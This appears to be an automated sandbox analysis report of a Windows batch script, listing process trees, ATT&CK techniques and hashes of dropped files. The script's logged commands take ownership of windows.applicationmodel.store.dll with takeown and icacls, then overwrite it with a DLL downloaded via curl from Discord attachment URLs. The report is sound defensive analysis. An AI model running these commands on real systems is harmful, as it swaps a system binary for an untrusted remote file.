  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell -Command "(New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2092
- - C:\Windows\system32\choice.exe
    CHOICE /C:YN /M "PLEASE MAKE SURE IF YOUR INTERNET CONNECTION IS STABLE?: "
    3⤵
    PID:4196
- - C:\Windows\system32\choice.exe
    CHOICE /C:YN /M "DO YOU AGREE WITH THIS SCRIPT DOWNLOADING 3.75 MB FILES?: "
    3⤵
    PID:4768
- - C:\Windows\System32\takeown.exe
    takeown /f windows.applicationmodel.store.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2684
- - C:\Windows\System32\icacls.exe
    icacls windows.applicationmodel.store.dll /grant Admin:f
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f windows.applicationmodel.store.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:2816
- - C:\Windows\SysWOW64\icacls.exe
    icacls windows.applicationmodel.store.dll /grant Admin:f
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:2976
- - C:\Windows\System32\curl.exe
    curl "https://cdn.discordapp.com/attachments/1030847408202076220/1230458652247199764/Windows.ApplicationModel.Store.dll?ex=663364eb&is=6620efeb&hm=8ee422316a75856bc8efd383a74812148a5582aa3e357dcb6361f09b527582b0&" -o windows.applicationmodel.store.dll
    3⤵
    - Drops file in System32 directory
    PID:1148
- - C:\Windows\SysWOW64\curl.exe
    curl "https://cdn.discordapp.com/attachments/1030847408202076220/1230525388535365682/Windows.ApplicationModel.Store.dll?ex=6633a312&is=66212e12&hm=72c7d8bb512e739b2e4852a4bbf380cafa72e0f2306f73729483ceb86fb8b1a9&" -o windows.applicationmodel.store.dll
    3⤵
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    PID:5168
- - C:\Windows\SysWOW64\choice.exe
    choice /n /c YN /m "Would you like to visit my blog [Y,N]?"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=212,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5328 /prefetch:14
  2⤵
  PID:4288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5708,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5940 /prefetch:14
  2⤵
  PID:4732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4656,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5704 /prefetch:14
  2⤵
  PID:2428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4188,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=744 /prefetch:1
  2⤵
  PID:2040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5600,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4180 /prefetch:1
  2⤵
  PID:1488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=5400,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5992 /prefetch:10
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5428,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4308 /prefetch:14
  2⤵
  PID:5968

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5224

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:5652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:?url=https%3A%2F%2Fwww.bing.com%2Fsearch%3Fq%3Dmicrosoft%2Bstore%26filters%3Dufn%253a%2522Microsoft%2BStore%2522%2Bsid%253a%252277154678-a2a4-4217-9afc-d96235dbe5fe%2522%26asbe%3DAS%26form%3DWSBEDG%26qs%3DMB%26cvid%3D3d65b63f504d4b819992b6207f18701d%26pq%3Dmicrosoft%2Bstore%26cc%3DUS%26setlang%3Den-US%26nclid%3D92CFC91C43B003AB3E69376F75A654BB%26ts%3D1743503702864%26nclidts%3D1743503702%26tsms%3D864%26wsso%3DModerate&timestamp=1743503702864&source=WindowsSearchBox&campaign=addedgeprot&medium=AutoSuggest
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x34c,0x7ffd6d66f208,0x7ffd6d66f214,0x7ffd6d66f220
  2⤵
  PID:3308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1824,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=2328 /prefetch:11
  2⤵
  - Detected potential entity reuse from brand MICROSOFT.
  PID:3316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2108,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=1988 /prefetch:2
  2⤵
  PID:4960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2564,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=2320 /prefetch:13
  2⤵
  PID:5936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3424,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=3648 /prefetch:1
  2⤵
  PID:3720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3432,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=3716 /prefetch:1
  2⤵
  PID:5244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4800,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:1
  2⤵
  PID:5580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=5036,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:1
  2⤵
  PID:952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4124,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:1
  2⤵
  PID:4204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3688,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=5176 /prefetch:14
  2⤵
  PID:4192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3620,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=4848 /prefetch:14
  2⤵
  PID:4496
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5712,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=5856 /prefetch:14
  2⤵
  PID:5312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5872,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=5888 /prefetch:14
  2⤵
  PID:4920
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5712,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=5856 /prefetch:14
  2⤵
  PID:5940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6100,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=6120 /prefetch:14
  2⤵
  PID:544
- - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
    cookie_exporter.exe --cookie-json=1132
    3⤵
    PID:4932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=5808 /prefetch:14
  2⤵
  PID:1460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5768,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=5784 /prefetch:14
  2⤵
  PID:1376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=5808,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=5820 /prefetch:1
  2⤵
  PID:2096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=3692,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=6588 /prefetch:1
  2⤵
  PID:5344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6328,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=6384 /prefetch:12
  2⤵
  PID:5312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6908,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=5828 /prefetch:14
  2⤵
  PID:5196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6784,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=5848 /prefetch:14
  2⤵
  PID:5848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6104,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=6900 /prefetch:14
  2⤵
  PID:2056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=3616,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=4920 /prefetch:1
  2⤵
  PID:3956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=6924,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=6972 /prefetch:1
  2⤵
  PID:3664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=3804,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7212,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=7224 /prefetch:14
  2⤵
  PID:2464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=7528,i,9610659690200705310,6920140591152515586,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:1
  2⤵
  PID:5624

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:2560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
1⤵
PID:3404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:2744

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004A8 0x00000000000004C8
1⤵
PID:2404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
2b8e2978a92aee19b689d49102d72444

SHA1
79691d783adac3c03fd855f9a9158a2595268f78

SHA256
b14e0107e8db610245f20931a83eb80fe0a7281db405a54892a49d3b98ea13ee

SHA512
9669b5a5dc371fb4c45960b9c32ad16fe3d9454ddb0ff426aa7e141bdb444f8db69d1357bdb441b82f4295678e01e4c79b11420193c5815cee7591362051f221

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
80eed6a3450cfac03e8d9a6a536729ab

SHA1
5afae2c35c86eb2e6f4c892f82559eaffc75ca56

SHA256
66452e7aeb74fcefb7e44757e4f17e20be61e15526f7079121c2883fcd7b3eb9

SHA512
23d6cf5f78fc2389b832a2ff53a43ffd026e3b17968ca06bac955c06b8a7ff13338d8a586028c46f8033d18c3b0546585af7f694e3df7bb1347bf76ddb099edd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
f7fb98a20de832e18acaed260fd79e39

SHA1
90268e4f8c7aa9a2e092fc374074328e1013c2bd

SHA256
d46e69a601492bab01b5013b1d40cc2aed70a36dd7e5c9c6d4e5b2ff9d3bfe6c

SHA512
f0bf5ec6c0cc7e3472632999958eab11337fefd313b72225de9aa3bb063d4ab3efa18fdec671d8f1c6ef47bd89b42e4e99a66ac4edd918a6e6be705dfd362171

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
b80d971aa99e2fa5888b58a4686c6a70

SHA1
5030f8c6f1df5c4c3a9334101b91150fa1ad65ba

SHA256
7a225932fcdf85d3b60c549e717ece10353605a5e5402153a14037b72e9fc568

SHA512
621257446206f973b099a75344bbab38605f3615c1f8033b2ff816e214654431cb0eb6bc192644345949157646667c6dc1c377466d0ca5acc72c79b35f767536

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
10b2da91cd041aa748c25e68d819d2fe

SHA1
9c0b39d7309ecf60e14245e87af210dfce01e479

SHA256
14f99c88aedf1a005f9da8a52f2270c50a9f36f850a90fa353ebbfdae183f892

SHA512
6a1047d6518bd77e51304fc97de30c6fe1aa0fd2b6ac3c862e6127a72b68f0491b1d6ba2acc0e00a177c48272b13c2791542c6af66b44680938c42e5ac6dd14e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
06541321f0f80725735e1cee1214abc6

SHA1
5e9b87ce15cf32ce5a20682497bdc6180e2b6677

SHA256
3d030a3e7b244e8c8fa05578dec5a9e2906a6084425e6abaca13570e6083eae2

SHA512
0a09a5c3806004ea612cf196675c25ea94e33fe1756d8212f91ac009eadb1b806c3240c1db66c5bb3ef135eaffc3e477b765f9e4f95e29d67a215c2cd79046aa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
4119d914dbe0ae084ea5cfd3b4fb9920

SHA1
3975ac284401ad304bdfec34b6ef96e807e2ac57

SHA256
4bd6aee5089f2b2c5d04e98ced1df468dce03c94c8c19e5932b36d5f076f463b

SHA512
ab005d3c868592fdde6fdefd5b04be0e109fcda25bcc516daf6801e830321725d33d1d2a36cb18e5a88f8eeb3ee0c0880717f460e89e7bd1b440e120ca71c170

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
640d8b40a43122a5a9cd7493369e4833

SHA1
98b80c5208b2cf44c13be5e5e8790a82ea20a838

SHA256
1bc71c63fd4e17258362035ad28ccab10bc760ea7c50fdf68b51fe985274df9b

SHA512
d2e74747e7b7a6eab8e6e1574246a71e41d0e2ac3e520c70cfe046b9a489a76f8457ffcf686536cc589837240676b525d412a5e2aa035b47043775e6bddfb8b4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
b58b1ef9194348365214b511dac7594c

SHA1
82ca6c32408c1706ceb733695dae1550376781cd

SHA256
6956b01b5c6863a116badc25840440a6d4a762961c8e77bb7339f06340ddf4fc

SHA512
ecf3cab4e3bb07cb5c16071a938aa1cc19af9997212518a10864bd4d883ed2a40562def389bfbe76166fc8d7014553538c81e12750cd6fbfdaf3af25bca12831

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
df727236fc91832fb3dc8943a7eebcbc

SHA1
9baade99253a065624a0a982243e75669ab22dd8

SHA256
cccf5ab83c5d1cc66a88b423055054d3824efdf14477cbeb6448436cdc476cf1

SHA512
b6223e50572e48af3e081b3a8f3134303a091c74473fdc02abc00ba1b37449fd8601cb2196dbbc2eead43ca3a67da2048454ad3ad2fdf3cca51659ba0c16e4eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58214e.TMP

Filesize
48B

MD5
c76f4adb70208d77286654a298b6a48f

SHA1
6ef23e8d725ffa58ff178f7c936830356d2fe3f2

SHA256
76f949c4c28e7ec4b3f2412350d7de524159dfc2a2cbea111be4cebb87ff1d5a

SHA512
ecf48b111ca9737bd5417100e3fef54f53890b5770cfa31a2eefaa79e4dbdf61622d5cff0135af9714cb00ee1fe54f5477c99038e29aa5810b7d3511cd0005fe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
81KB

MD5
39cce51a9d49ddf45deb10427e9f1bfa

SHA1
a321b1cb3aa86ff3e4271848adf52c272e65a072

SHA256
7d6a33b7a15fc62b17d352b36dc03e0d41b98a44f2cbd2c20c72f5a09e4ea53c

SHA512
ddba4869bbc965387ed5d291eebf89b5201690d2136b0873350148e0a131cffa6669b991d6bf6fb8d580bf9ffdb078968caf1b72ce7cae66a9b7752a59de0799

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
96c215cc654cd90da037dc44d8bf715b

SHA1
